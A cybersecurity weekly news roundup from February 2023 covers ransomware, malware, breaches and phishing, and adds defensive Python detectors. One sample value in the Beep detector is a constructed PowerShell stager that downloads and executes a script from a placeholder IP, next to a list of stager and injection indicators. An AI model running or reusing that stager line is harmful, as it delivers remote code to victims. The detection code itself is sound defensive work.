Thursday, February 16th, 2023
Cybersecurity Week in Review (17/2/23)
ESXiArgs Ransomware Hits Over 500 New Targets in European Countries
A ransomware campaign dubbed ESXiArgs has hit over 500 new hosts, most of them in European countries. Rather than arriving by phishing, the ransomware is deployed straight onto internet-exposed VMware ESXi hypervisors: the intrusions have been widely linked to CVE-2021-21974, a two-year-old heap overflow in the ESXi OpenSLP service that was patched in February 2021, although the entry point has not been confirmed for every victim. Once on the host, the encryptor targets the files that make up the virtual machines and drops a ransom note demanding payment for the decryption key.
The first set of infections dates back to October 12, 2022, much earlier than when the campaign began to gain traction at the start of February 2023. Then on January 31, 2023, ransom notes on two hosts are said to have been updated with a revised version that matches the ones used in the current wave. Some of the crucial differences between the two ransom notes include the use of an onion URL instead of a Tox chat ID, a Proton Mail address at the bottom of the note, and a lower ransom demand (1.05 Bitcoin vs. 2.09 Bitcoin).
The attackers behind ESXiArgs are specifically targeting organisations that run VMware ESXi. Because the ransomware encrypts the virtual machine files held on the hypervisor’s datastores (disk images and VM configuration files) rather than individual endpoints, a single compromised host can take every guest it runs offline at once, which is why the data loss and disruption for affected organisations is so broad.
The campaign is a clear reminder of the importance of keeping systems patched and of keeping hypervisor management services off the public internet: attackers don’t need to scour for new exploits or novel techniques when they know that a long-patched flaw in an exposed service still works against many organisations. Where OpenSLP is not needed on ESXi it should be disabled, as VMware has recommended, and the patched build applied regardless.
The spike also coincides with an 87% year-over-year increase in ransomware attacks targeting industrial organisations in 2022, with 437 out of 605 attacks striking the manufacturing sector.
Source – https://thehackernews.com/2023/02/esxiargs-ransomware-hits-over-500-new.html
Experts Warn of ‘Beep’ – A New Evasive Malware That Can Fly Under the Radar
A new piece of evasive malware dubbed Beep has been discovered that’s designed to fly under the radar and drop additional payloads onto a compromised host. The malware has been implemented with as many anti-debugging and anti-VM (anti-sandbox) techniques as possible.
One such technique involves delaying execution through the use of the Beep API function, hence the malware’s name. Beep comprises three components, the first of which is a dropper that’s responsible for creating a new Windows Registry key and executing a Base64-encoded PowerShell script stored in it.
The PowerShell script, for its part, reaches out to a remote server to retrieve an injector, which, after confirming it’s not being debugged or launched in a virtual machine, extracts and launches the payload via a technique called process hollowing. The payload is an information stealer that’s equipped to collect and exfiltrate system information and enumerate running processes. Other instructions the malware is capable of accepting from a command-and-control (C2) server include the ability to execute DLL and EXE files.
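The dropper’s habit of parking a Base64-encoded PowerShell script in a registry value is easy to hunt for once you know that powershell.exe’s -EncodedCommand expects UTF-16LE text under the Base64. The following is an added example, not code from the Beep analysis or from the malware: it scans a set of registry values for Base64 blobs, tries the UTF-16LE and UTF-8 decodings, discards anything that does not look like text, and flags scripts that contain download-and-execute or injection primitives. The registry paths, the stager text, the address in it and the indicator list are all constructed for illustration.

```python
import base64
import re
from typing import Optional

# Constructed sample data, not artifacts from the real Beep dropper: the key paths,
# the stager text and the address in it are invented for illustration.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/inj.ps1')"


def ps_encode(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_VALUES = {
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive":
        r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    # A Base64 blob that is binary data (e.g. serialised settings): must not be flagged.
    r"HKCU\Software\Contoso\Updater\Blob": base64.b64encode(bytes(range(48))).decode("ascii"),
    # The value a dropper like Beep would leave behind.
    r"HKCU\Software\Contoso\Updater\Script": ps_encode(STAGER),
}

B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Primitives a stager needs: fetch a next stage, evaluate it, decode it, or inject into a process.
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "Net.WebClient",
              "Invoke-WebRequest", "FromBase64String", "Start-Process",
              "VirtualAlloc", "WriteProcessMemory")


def decode_powershell(blob: str) -> Optional[str]:
    """Decode a Base64 blob as UTF-16LE (the -EncodedCommand form) or UTF-8 and return it
    only if the result looks like script text rather than binary data."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        printable = sum(32 <= ord(c) < 127 or c in "\r\n\t" for c in text)
        if text and printable / len(text) >= 0.95:
            return text
    return None


def scan_registry_values(values: dict) -> list:
    """Return one finding per registry value whose Base64 content decodes to a script
    that uses any of the SUSPICIOUS primitives."""
    findings = []
    for key, data in values.items():
        for blob in B64_RE.findall(data):
            script = decode_powershell(blob)
            if script is None:
                continue
            hits = [m for m in SUSPICIOUS if m.lower() in script.lower()]
            if hits:
                findings.append({"key": key, "script": script, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_registry_values(SAMPLE_VALUES):
        print(f["key"], "->", f["indicators"])
```

On a real host the input would come from a registry export or a live query of the user and machine hives; the decoder is the part that matters, since a plain string search for "powershell" never sees the UTF-16LE-encoded script.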
A number of other features are yet to be implemented, suggesting that Beep is still in its early stages of development. What sets the emerging malware apart is its heavy focus on stealth, adopting a large number of detection evasion methods in an attempt to resist analysis, avoid sandboxes, and delay execution.
Delivered via spam email attachments, Discord, or OneDrive URLs, the malware is suspected to be offered as a service for other criminal actors looking to distribute their own payloads.
Source – https://thehackernews.com/2023/02/experts-warn-of-beep-new-evasive.html
North Korea’s APT37 Targeting Southern Counterpart with New M2RAT Malware Attack
The North Korea-linked threat actor tracked as APT37 has been linked to a new piece of malware dubbed M2RAT, used in attacks targeting its southern counterpart and suggesting continued evolution of the group’s tooling and tactics.
APT37, also tracked under the monikers Reaper, RedEyes, Ricochet Chollima, and ScarCruft, is linked to North Korea’s Ministry of State Security (MSS) unlike the Lazarus and Kimsuky threat clusters that are part of the Reconnaissance General Bureau (RGB). MSS is tasked with domestic counterespionage and overseas counterintelligence activities, with APT37’s attack campaigns reflective of the agency’s priorities. The operations have historically singled out individuals such as defectors and human rights activists.
The threat actor is known to rely on customised tools such as Chinotto, RokRat, BLUELIGHT, GOLDBACKDOOR, and Dolphin to harvest sensitive information from compromised hosts. What stands out in this RedEyes campaign is the combination of a Hangul EPS vulnerability for initial code execution with steganography to smuggle in the malicious payload.
The infection chain observed in January 2023 commences with a decoy Hangul document, which exploits a now-patched flaw in the word processing software (CVE-2017-8291) to trigger shellcode that downloads an image from a remote server. The JPEG file uses steganographic techniques to conceal a portable executable that, when launched, downloads the M2RAT implant and injects it into the legitimate explorer.exe process.
While persistence is achieved by means of a Windows Registry modification, M2RAT functions as a backdoor capable of keylogging, screen capture, process execution, and information theft. Like Dolphin, it’s also designed to siphon data from removable disks and connected smartphones.
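The step where a JPEG carries a hidden executable is worth being able to reproduce on the defensive side. The example below is added here and is not code from the M2RAT analysis; it does not reproduce whatever encoding APT37 actually used, which the page does not describe, but assumes the simplest form of the trick, a PE image appended after the JPEG end-of-image marker. It shows how to carve such a payload out by validating the DOS header’s e_lfanew pointer and the "PE\0\0" signature rather than trusting a bare "MZ" match. Both the JPEG container and the PE stub are constructed in the code.

```python
import struct

JPEG_SOI = b"\xff\xd8"   # start of image
JPEG_EOI = b"\xff\xd9"   # end of image; a decoder stops here, anything after it is ignored


def build_fake_pe(stub: bytes = b"payload") -> bytes:
    """Constructed minimal PE-looking blob: a 64-byte DOS header whose e_lfanew field
    (offset 0x3C) points at the 'PE\\0\\0' signature. Not a runnable executable."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = struct.pack("<I", e_lfanew)
    return bytes(dos) + b"PE\x00\x00" + stub


def build_fake_jpeg(appended: bytes) -> bytes:
    """Constructed JPEG-like container: SOI, one JFIF APP0 segment, filler, EOI,
    then whatever is appended (the carrier for the hidden executable)."""
    app0_body = b"JFIF\x00" + b"\x01\x01" + b"\x00" + b"\x00\x01" + b"\x00\x01" + b"\x00\x00"
    app0 = b"\xff\xe0" + struct.pack(">H", 2 + len(app0_body)) + app0_body
    return JPEG_SOI + app0 + b"\x00" * 64 + JPEG_EOI + appended


def carve_pe_after_eoi(data: bytes):
    """Return (offset, blob) for a PE image found after the JPEG end-of-image marker,
    or None. The first EOI is used deliberately: an embedded thumbnail has its own EOI,
    and scanning from there still reaches anything appended after the real one."""
    if not data.startswith(JPEG_SOI):
        return None
    eoi = data.find(JPEG_EOI)
    if eoi < 0:
        return None
    pos = data.find(b"MZ", eoi + 2)
    while pos >= 0:
        if pos + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, pos + 0x3C)[0]
            sig = pos + e_lfanew
            # Real DOS headers are 64 bytes, so e_lfanew is at least 0x40; cap it to
            # avoid chasing absurd pointers from random 'MZ' byte pairs.
            if 0x40 <= e_lfanew < 0x1000 and data[sig:sig + 4] == b"PE\x00\x00":
                return pos, data[pos:]
        pos = data.find(b"MZ", pos + 1)
    return None


if __name__ == "__main__":
    image = build_fake_jpeg(build_fake_pe())
    found = carve_pe_after_eoi(image)
    print("carved at offset", found[0] if found else None)
```

The same two checks (a sane e_lfanew and the PE signature) are what separate a real carve from the false positives a plain "MZ" grep produces in compressed image data.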
This is not the first time CVE-2017-8291 has been weaponised by North Korean threat actors. In late 2017, the Lazarus Group was observed taking advantage of the flaw in attacks targeting South Korean cryptocurrency exchanges and users to deploy Destover malware, according to Recorded Future.
Source – https://thehackernews.com/2023/02/north-koreas-apt37-targeting-southern.html
Expert warns Irish universities to ‘urgently’ review cybersecurity after MTU data leaked on dark web
Raluca Saceanu, chief executive officer of Smarttech247, advised third-level colleges in Ireland to “urgently” review their protocols following a ransomware attack at an Irish university.
It is understood a large amount of staff and student data, including financial and medical details have been uploaded to the dark web by hackers who demanded a ransom from Munster Technological University (MTU) last week. Raluca stated that an awareness of cybersecurity basics can be a “crucial” preventative step.
Higher Education Minister Simon Harris reiterated the support being offered by the authorities to MTU, where classes resumed this week following a closure of services last week. Staff and students at MTU have been urged to be vigilant following the attack.
They were notified by the university on Sunday evening that its data had been copied and shared on the dark web. MTU had previously revealed it was being blackmailed and held to ransom by a group of hackers, believed to be based either in Russia or in part of the former Soviet Union, the High Court heard last week.
The cyberattack on MTU’s IT system, detected in recent days, is believed to have been carried out by individuals in a ransomware group known as ALPHV, BlackCat or Noberus, the court heard. MTU had claimed those suspected of carrying out the attack are understood to be made up of former members of the ‘REvil’ ransomware group, which was based in Russia and in 2021 attacked a supplier of Apple.
The college secured an interim injunction from the High Court, in response to the incident, as an attempt to “mitigate” the data breach and to “prevent the sale, publication, sharing, possession, or any other use of any data illegally obtained from MTU systems in the course of this ransomware incident.”
Smarttech247 is behind the cybersecurity conference Zero Day Con, and Ms Saceanu said the disruption caused to students and staff at MTU is a “nightmare scenario” for any organisation.
“Finding yourself at the centre of an attack by ruthless bad actors can have a devastating effect on your business so without a doubt, prevention is better than cure,” she said.
“While investigations into how this incident unfolded are continuing, we strongly advise third-level institutions all over the country to act now and review the measures they have in place that could be key to stopping something similar happening to them.”
Ms Saceanu outlined some “golden rules” for an organisation’s protection, which she said must be prioritised in any review.
Organisations should implement firewalls, intrusion detection systems, and secure routers to prevent unauthorised access to their networks. They should also implement “event monitoring capabilities” to ensure that, should an intrusion occur, a security team can act fast and respond to the incident accordingly. Institutions must ensure that sensitive data such as student records, research data, and financial information is encrypted “both in transit and at rest”.
They should also implement “strong authentication methods” such as two-factor authentication and regularly monitor user access to sensitive systems and data as well as implementing anti-virus and anti-malware software to prevent malicious attacks.
Source – https://www.independent.ie/news/expert-warns-irish-universities-to-urgently-review-cybersecurity-after-mtu-data-leaked-on-dark-web-42341254.html
New ‘MortalKombat’ ransomware targets systems in the U.S.
Hackers conducting a new financially motivated campaign are using a variant of the Xorist commodity ransomware named ‘MortalKombat’ together with the Laplas clipper in their attacks.
Both malware families are used to commit financial fraud: the ransomware extorts victims for a decryptor, and Laplas steals cryptocurrency by hijacking transactions. Laplas is a clipper released last year that monitors the Windows clipboard for cryptocurrency addresses and, when it finds one, silently replaces it with an address under the attacker’s control, so a victim who copies a legitimate destination address and pastes it into a wallet unknowingly sends the funds to the attacker.
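Laplas works because a swapped address that is wrong but well-formed looks exactly like a correct one: the attacker-controlled address carries a valid checksum, so format validation alone cannot catch the substitution, and the only reliable check is comparing what was copied with what is about to be pasted. The example below is added here and is not code from Laplas, MortalKombat, or the article’s sources. It implements Base58Check validation for legacy Bitcoin addresses, a format-only check for Ethereum addresses, and a copy/paste comparison over a constructed sequence of clipboard events. The two Bitcoin addresses are well-known public ones (the genesis block address and the all-zero hash160 “burn” address) used purely as sample data; the event sequence is invented.

```python
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text: str) -> bytes:
    """Base58 decode; each leading '1' stands for one leading zero byte."""
    value = 0
    for ch in text:
        digit = B58_ALPHABET.find(ch)
        if digit < 0:
            raise ValueError("not a base58 string")
        value = value * 58 + digit
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    leading_zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeros + body


def is_valid_btc_address(addr: str) -> bool:
    """Base58Check validation for legacy P2PKH ('1...') and P2SH ('3...') addresses:
    version byte + 20-byte hash + 4-byte checksum = first 4 bytes of double-SHA256.
    Bech32 ('bc1...') addresses are out of scope for this example."""
    if not (26 <= len(addr) <= 35) or addr[0] not in "13":
        return False
    try:
        raw = b58decode(addr)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    payload, checksum = raw[:21], raw[21:]
    digest = hashlib.sha256(hashlib.sha256(payload).digest()).digest()
    return digest[:4] == checksum


ETH_RE = re.compile(r"0x[0-9a-fA-F]{40}")


def address_kind(text: str):
    """Return 'btc', 'eth' or None. The ETH check is format-only: EIP-55 checksums
    need keccak-256, which the standard library does not provide."""
    t = text.strip()
    if ETH_RE.fullmatch(t):
        return "eth"
    if is_valid_btc_address(t):
        return "btc"
    return None


def clipboard_substituted(copied: str, pasted: str) -> bool:
    """True when the clipboard holds a different address of the same kind as the one the
    user last copied: the signature of a clipper, since a user copy resets 'copied'."""
    kind = address_kind(copied)
    return kind is not None and address_kind(pasted) == kind and copied.strip() != pasted.strip()


# Constructed clipboard event log: ("copy", text) is a user action, ("paste", text) is what
# the clipboard holds at paste time. Both addresses are well-known public sample values.
GENESIS_ADDR = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
BURN_ADDR = "1111111111111111111114oLvT2"
SAMPLE_EVENTS = [
    ("copy", "meeting at 10"), ("paste", "meeting at 10"),
    ("copy", GENESIS_ADDR), ("paste", GENESIS_ADDR),   # untouched
    ("copy", GENESIS_ADDR), ("paste", BURN_ADDR),      # swapped in transit
]


def find_hijacks(events):
    """Return indices of paste events whose content differs from the last copied address."""
    hijacks, last_copied = [], ""
    for i, (action, text) in enumerate(events):
        if action == "copy":
            last_copied = text
        elif action == "paste" and clipboard_substituted(last_copied, text):
            hijacks.append(i)
    return hijacks


if __name__ == "__main__":
    print("valid:", is_valid_btc_address(GENESIS_ADDR), is_valid_btc_address(BURN_ADDR))
    print("hijacked paste events:", find_hijacks(SAMPLE_EVENTS))
```

Note what the checksum buys and what it does not: it rejects a mistyped address, but the attacker’s address passes it just as well as the victim’s, which is why the copy-versus-paste comparison, not validation, is the detection.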
As for MortalKombat, the new ransomware is based on the Xorist commodity ransomware family, which utilises a builder that lets threat actors customise the malware. Xorist has been decryptable for free since 2016. The attacks focused mainly on the United States, with some victims also in the UK, Turkey, and the Philippines.
The email contains a malicious ZIP attachment containing a BAT loader script that downloads a second archive from a remote resource. This archive contains one of the two malware payloads. The loader script will execute the downloaded payload as a process in the compromised system and then delete the downloaded files to minimise the chances of detection.
MortalKombat is a Xorist ransomware variant first discovered in January 2023, named after the popular fighting video game and featuring a ransom note/wallpaper that includes art from the franchise. The ransomware is not very sophisticated: it encrypts system files and applications too, something most ransomware deliberately avoids so that the system stays stable enough for the victim to read the note and pay.
The wallpaper also acts as a ransom note, instructing the victim to use qTox, a peer-to-peer encrypted instant messaging client, to negotiate with the cybercriminals, who demand payment in Bitcoin. The attacker also provides a ProtonMail email address in case the victim has trouble registering a new account on qTox. Although MortalKombat has no wiper functionality, it corrupts system folders such as the Recycle Bin so that victims cannot retrieve files from there, disables the Windows Run command window, and removes all entries from Windows startup.
Moreover, the ransomware fiddles with the Windows registry, creating a Run registry key (“Alcmeter”) for persistence while deleting the installed application’s root registry key in the HKEY_CLASSES_ROOT registry hive. The HKEY_CLASSES_ROOT hive stores information about file associations, commands, and icons used for each file type, so deleting these entries means the applications can no longer function.
Analysts do not know what the operational model of MortalKombat ransomware is, and whether it is the custom strain of a lone threat actor or is sold to other cybercriminals like Laplas.
Source – https://www.bleepingcomputer.com/news/security/new-mortalkombat-ransomware-targets-systems-in-the-us/
Eurostar forces ‘password resets’ — then fails and locks users out
International high-speed rail operator Eurostar is emailing its users this week and forcing them to reset their account passwords in a bid to “upgrade” security. Eurostar is well known for connecting the United Kingdom to France, Belgium, and the Netherlands, with most of its trains crossing the Channel Tunnel.
Eurostar is emailing all customers, forcing them to reset their account passwords as the railway operator claims to be “busy” upgrading account security for everyone. But users who visit the password reset link are met with “technical problems,” thereby making it impossible for them to reset their password or log in to their accounts.
Upon every successful login attempt, users are presented with the password reset interstitial that won’t let them access their account until a password reset is performed. However, the password reset never completes because of the aforementioned technical error. The bug has caused increased frustration among Eurostar passengers and users around the world, who are now effectively locked out of their accounts.
In a long Twitter thread posted Friday, Eurostar admitted being aware of users met with issues when attempting to access Club Eurostar accounts and blamed it on ongoing maintenance. But, this was prior to the company sending out password reset emails. The railway operator, at the time, had advised customers to clear their browser cookies or re-attempt registration using the same email address. But this does not seem to work as a solution for anyone.
Eurostar last enforced a widespread password reset in 2018 when it had experienced a data breach, as reported by The Telegraph at the time. It is not yet known if the forced password reset is indeed Eurostar’s way of tightening account security, or if the action is prompted by a cybersecurity incident, such as unauthorised access to systems or a data breach.
Source – https://www.bleepingcomputer.com/news/security/eurostar-forces-password-resets-then-fails-and-locks-users-out/
Healthcare giant CHS reports first data breach in GoAnywhere hacks
Community Health Systems (CHS) says it was impacted by a recent wave of attacks targeting a zero-day vulnerability in Fortra’s GoAnywhere MFT secure file transfer platform.
The healthcare provider giant said on Monday that Fortra issued an alert saying that it had “experienced a security incident” leading to some CHS data being compromised. A subsequent investigation revealed that the resulting data breach affected the personal and health information of up to 1 million patients.
CHS stated that while the investigation is still ongoing, the company believes that the Fortra breach has not had any impact on its own information systems and that there has been no material interruption of its business operations, including the delivery of patient care. It added that it would offer identity theft protection services and notify all affected individuals whose information was exposed in the breach.
CHS is a leading healthcare provider that operates 79 affiliated acute-care hospitals and over 1,000 other sites of care across the United States.
The Clop ransomware gang claims to be behind these attacks and stated that they’ve breached and stolen data from over 130 organisations. Clop also said they had allegedly stolen the data over ten days after breaching GoAnywhere MFT servers vulnerable to exploits targeting the CVE-2023-0669 RCE bug. The gang didn’t provide proof or additional details regarding their claims, if they had already started extorting victims, or what ransoms they were asking for.
Links have been found between the GoAnywhere MFT attacks and TA505, a threat group known for deploying Clop ransomware in the past. Clop is known for using a similar tactic in December 2020, when they discovered and exploited a zero-day bug in Accellion’s legacy File Transfer Appliance (FTA) to steal large amounts of data from roughly 100 companies worldwide. At the time, the victims received emails demanding $10 million in ransoms to avoid having their data published on the cybercrime group’s data leak site.
Organisations that had their Accellion servers hacked include, among others, energy giant Shell, cybersecurity firm Qualys, supermarket giant Kroger, and multiple universities worldwide such as Stanford Medicine, University of Colorado, University of Miami, University of California, and the University of Maryland Baltimore (UMB). If Clop follows a similar extortion strategy, we will likely see a rapid release of data for non-paying victims on the threat actor’s data leak site in the near future.
GoAnywhere MFT’s developer Fortra (formerly known as HelpSystems) disclosed to its customers last week that a new vulnerability (CVE-2023-0669) was being exploited as a zero-day in the wild. The company issued emergency security updates after a proof-of-concept exploit was released online, allowing unauthenticated attackers to gain remote code execution on vulnerable servers.
Even though Shodan currently shows over 1,000 GoAnywhere instances exposed to the internet, only 136 are listening on ports 8000 and 8001, the ones used by the vulnerable admin console. The console was designed to be reachable only from a private network, so any instance exposing it to the internet should be treated as the highest-priority candidate for patching and for a compromise assessment, not just a patch. Fortra also revealed, after releasing patches, that some of its MFTaaS hosted instances were breached in the attacks.
CISA added the GoAnywhere MFT flaw to its Known Exploited Vulnerabilities Catalog on Friday, ordering U.S. federal agencies to secure their systems within three weeks, by March 3rd.
Source – https://www.bleepingcomputer.com/news/security/healthcare-giant-chs-reports-first-data-breach-in-goanywhere-hacks/
Pepsi Bottling Ventures suffers data breach after malware attack
Pepsi Bottling Ventures LLC suffered a data breach caused by a network intrusion that resulted in the installation of information-stealing malware and the extraction of data from its IT systems.
Pepsi Bottling Ventures is the largest bottler of Pepsi-Cola beverages in the United States, responsible for manufacturing, selling, and distributing popular consumer brands. It operates 18 bottling facilities across North and South Carolina, Virginia, Maryland, and Delaware.
In a sample security incident notice filed with Montana’s Attorney General office, the company explains that the breach occurred on December 23, 2022. But it wasn’t until January 10th, 2023, or 18 days later that it was discovered, with remediation taking even longer.
The notice stated that an unknown party accessed their internal IT systems on or around December 23, 2022, installed malware, and downloaded certain information contained on the accessed IT systems. They are continuing to monitor the systems for unauthorised activity, but the last known date of unauthorised IT system access was January 19, 2023.
Based on the results of Pepsi’s internal investigation so far, the following information has been impacted:
- Full names
- Home address
- Financial account information (including passwords, PINs, and access numbers)
- State and Federal government-issued ID numbers and driver’s license numbers
- ID cards
- Social Security Numbers (SSNs)
- Passport information
- Digital signatures
- Information related to benefits and employment (health insurance claims and medical history)
In response to this incident, the company has implemented additional network security measures, reset all company passwords, and informed the law enforcement authorities. At this time, the review of potentially affected records and systems is still underway, while all affected systems have been suspended from the firm’s regular operations.
The recipients of the breach notices are being offered a one-year free-of-charge identity monitoring service through Kroll to help them prevent identity theft that may occur as a result of the stolen data.
It is still not clear how many individuals were affected by the data breach and whether the affected parties include customers or employees.
Source – https://www.bleepingcomputer.com/news/security/pepsi-bottling-ventures-suffers-data-breach-after-malware-attack/
Lazarus hackers use new mixer to hide $100 million in stolen crypto
North Korean hackers have found a way around U.S.-imposed sanctions to launder the cryptocurrency proceeds from their heists, according to evidence discovered by blockchain analysts.
The Lazarus Group, as the threat actor is typically referred to, has laundered about $100 million in stolen Bitcoin since October 2022 through a single crypto-mixing service called Sinbad. Last year, the U.S. Treasury’s Office of Foreign Assets Control (OFAC) announced sanctions against the cryptocurrency mixing services Blender and Tornado Cash, which Lazarus had used to launder close to $500 million in illicitly obtained cryptocurrency. The measure was taken after more than $600 million in crypto assets were stolen from Axie Infinity’s cross-chain bridge in a hack later attributed to the North Korean Lazarus group.
Hackers often use cryptocurrency mixers/tumblers because, for a fee, they hide the origin and owners of funds by blending the assets of a large number of users. While the OFAC sanctions did not stop Tornado Cash, they did put a stop to Blender, whose operator disappeared after reportedly taking almost $22 million in Bitcoin out of the mixer. Blender’s operator very likely launched a new service called Sinbad in early October 2022, which is now being used by Lazarus to launder assets. The connection emerged from tracing the funds from the Harmony Horizon crypto heist in June 2022, which caused about $100 million in losses.
Soon after the hack, strong links were found with Lazarus, something the FBI confirmed earlier this year, by following the funds through the Tornado Cash mixing service. Typically, the actor combined Tornado Cash mixing with a custodial service such as Blender. This time, though, they used another Bitcoin mixer called Sinbad. Unlike Tornado Cash, both Blender and Sinbad are custodial mixers, meaning all cryptocurrency that goes into the service is under the control of the operator, so users have to trust the operator enough to hand over control of their funds.
Researchers found that a “service” address on the Sinbad site received Bitcoin from a wallet believed to belong to the operator of Blender. The same wallet was used to pay for promoting the new crypto mixer and to fund almost all initial transactions coming to Sinbad, about $22 million. Apart from the wallet, the researchers also noticed a similar on-chain pattern behavior for both mixers, which includes specific characteristics of transactions.
Although referred to as one group, Lazarus defines multiple North Korean operators tasked by the government with collecting intelligence as well as stealing money to support national-level priorities and objectives. Besides targeting cryptocurrency exchanges, North Korean threat actors also engaged in ransomware attacks using several locker strains against health sector organisations in the U.S. and South Korea.
Source – https://www.bleepingcomputer.com/news/security/lazarus-hackers-use-new-mixer-to-hide-100-million-in-stolen-crypto/
NameCheap’s email hacked to send Metamask, DHL phishing emails
Domain registrar Namecheap had their email account breached Sunday night, causing a flood of MetaMask and DHL phishing emails that attempted to steal recipients’ personal information and cryptocurrency wallets. The phishing campaigns started around 4:30 PM ET and originated from SendGrid, an email platform used historically by Namecheap to send renewal notices and marketing emails.
After recipients began complaining on Twitter, Namecheap CEO Richard Kirkendall confirmed that the account was compromised and that they disabled email through SendGrid while they investigated the issue. Kirkendall also said that they believe the breach may be related to the API keys of Mailgun, MailChimp, and SendGrid being exposed in mobile apps.
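Namecheap’s working theory, that sender API keys were exposed inside mobile apps, points at a check every team shipping an app should run: strings-scan the build artifact for provider key formats before release. The example below is added here and is not Namecheap’s, SendGrid’s or any provider’s code. It extracts printable strings from a constructed binary blob and matches them against the publicly known shapes of SendGrid, Mailchimp and legacy Mailgun keys; the regexes approximate those formats (an assumption, adequate for a pre-release scan but not authoritative) and the sample keys are fabricated placeholders, not real credentials. Findings are redacted so that the CI log does not itself become the leak.

```python
import re

# Approximate public key formats (assumption: good enough for a pre-release scan,
# not the providers' authoritative definitions).
KEY_PATTERNS = {
    "sendgrid": re.compile(r"SG\.[A-Za-z0-9_-]{22}\.[A-Za-z0-9_-]{43}"),
    "mailchimp": re.compile(r"\b[0-9a-f]{32}-us[0-9]{1,2}\b"),
    "mailgun_legacy": re.compile(r"\bkey-[0-9a-f]{32}\b"),
}


def extract_strings(blob: bytes, min_len: int = 8):
    """Same idea as the `strings` tool: runs of printable ASCII at least min_len long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def redact(secret: str) -> str:
    """Keep just enough to identify which key leaked without reproducing it."""
    return secret[:6] + "..." + secret[-4:]


def scan_for_api_keys(blob: bytes):
    """Return (provider, redacted_key) for every key-shaped string in the blob."""
    findings = []
    for s in extract_strings(blob):
        for provider, pat in KEY_PATTERNS.items():
            for m in pat.finditer(s):
                findings.append((provider, redact(m.group())))
    return findings


# Constructed "app binary": a fake ELF-like header, some benign strings, and two fake keys
# built from repeated characters (placeholders, not real credentials).
FAKE_SENDGRID_KEY = "SG." + "a" * 22 + "." + "b" * 43
FAKE_MAILCHIMP_KEY = "0123456789abcdef0123456789abcdef-us21"
SAMPLE_APP = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 16
    + b"https://api.sendgrid.com/v3/mail/send\x00"
    + b"Authorization: Bearer " + FAKE_SENDGRID_KEY.encode() + b"\x00\x00"
    + b"MAILCHIMP_KEY=" + FAKE_MAILCHIMP_KEY.encode() + b"\x00"
    + b"no_secrets_here\x00"
)


if __name__ == "__main__":
    for provider, key in scan_for_api_keys(SAMPLE_APP):
        print(f"{provider}: {key}")
```

A hit in a shipped app means the key is already public and must be rotated; the structural fix is to send mail from a backend the app talks to, so no provider credential ever reaches a device, and to scope any remaining keys to the minimum the sender needs.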
The phishing emails sent in this campaign impersonate either DHL or MetaMask. The DHL email pretends to be a bill for a delivery fee required to complete the delivery of a package; its embedded links lead to a phishing page that attempts to steal the target’s information. The MetaMask email pretends to be a required KYC (Know Your Customer) verification to prevent the wallet from being suspended.
“We are writing to inform you that in order to continue using our wallet service, it is important to obtain KYC (Know Your Customer) verification. KYC verification helps us to ensure that we are providing our services to legitimate customers,” reads the MetaMask phishing email.
“By completing KYC verification, you will be able to securely store, withdraw, and transfer funds without any interruptions. It also helps us to protect you against financial fraud and other security threats.”
“We urge you to complete KYC verification as soon as possible to avoid suspension of your wallet.”
This email contains a Namecheap marketing link (https://links.namecheap.com/) that redirects the user to a phishing page pretending to be MetaMask; because the visible link belongs to a legitimate, expected sender, it defeats the usual “check the domain” advice. The page then prompts the user to enter their ‘Secret Recovery Phrase’ or ‘Private key’. Once a user provides either, the threat actors can import the wallet to their own devices and drain all the funds and assets. MetaMask is a non-custodial wallet with no KYC process and never asks for the recovery phrase, so any such request is a phishing attempt.
Namecheap published a statement Sunday night stating that their systems were not breached but rather it was an issue at an upstream system that they use for email. After the phishing incident, Namecheap says they stopped all emails, including two-factor authentication code delivery, trusted devices’ verification, and password reset emails, and began investigating the attack with their upstream provider.
While Namecheap did not state the name of this upstream system, the CEO of Namecheap previously tweeted that they were using SendGrid, which is also confirmed in the phishing emails’ mail headers.
Source – https://www.bleepingcomputer.com/news/security/namecheaps-email-hacked-to-send-metamask-dhl-phishing-emails/